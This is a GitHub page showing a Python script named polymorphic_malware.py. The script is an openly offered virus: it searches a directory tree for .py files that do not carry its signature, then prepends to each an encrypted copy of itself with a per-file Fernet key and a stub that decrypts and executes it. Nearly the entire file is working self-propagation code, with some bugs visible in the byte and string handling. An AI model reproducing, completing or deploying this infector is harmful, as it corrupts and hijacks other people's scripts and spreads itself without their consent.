-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpolymorphic_malware.py
57 lines (49 loc) · 2.29 KB
/
polymorphic_malware.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import os, datetime, inspect, base64, pty, socket;
from cryptography.fernet import Fernet;
# Signature to prevent reinfection
DATA_TO_INSERT = "#SIGNATURE";
# Search for .py files to infect
def search(path):
filestoinfect = [];
filelist = os.listdir(path);
for filename in filelist:
if os.path.isdir(path+"/"+filename):
filestoinfect.extend(search(path+"/"+filename));
elif filename[-3:] == ".py": #If it is a python script -> Infect it
infected = False;
for line in open(path+"/"+filename):
if DATA_TO_INSERT in line: #If the file is already infected -> Break the loop
infected = True;
break;
if infected == False:
filestoinfect.append(path+"/"+filename);
return filestoinfect;
# Infect files
def infect(filestoinfect):
target_file = inspect.currentframe().f_code.co_filename;
virus = open(os.path.abspath(target_file));
virusstring = "";
# Copy the entire virus to virusstring
for i,line in enumerate(virus):
if i>=0 and i <60:
virusstring += line;
virus.close;
decrypt_header = "from cryptography.fernet import Fernet; import os";
transfer = 'f = open("/path/to/directory/virus.py", "a");f.write(x);f.close();execfile("/path/to/directory/virus.py");os.remove("/path/to/directory/virus.py")' #Required for the copy to be able to execute itself.
# Generate a new cipher suite for each infected fille
for fname in filestoinfect:
key = Fernet.generate_key();
cipher_suite = Fernet(key);
f = open(fname);
temp = f.read();
f.close();
f = open(fname,"w");
encrypted_virusstring = cipher_suite.encrypt(virusstring)
decrypt = "x = cipher_suite.decrypt(encrypted_virusstring)";
f.write(DATA_TO_INSERT + '\n' + decrypt_header + '\n' + "key = " + ' " ' + key + ' " ' + '\n' + "cipher_suite = Fernet(key)" + '\n' + "encrypted_virusstring = " + ' " ' + encrypted_virusstring + ' " ' '\n' + decrypt + '\n' + transfer + '\n' + temp);
f.close();
# Infect files from the root directory
#filestoinfect = search(os.path.abspath(""))
# Infect files only in a specific folder
filestoinfect = search("/path/to/directory");
infect(filestoinfect);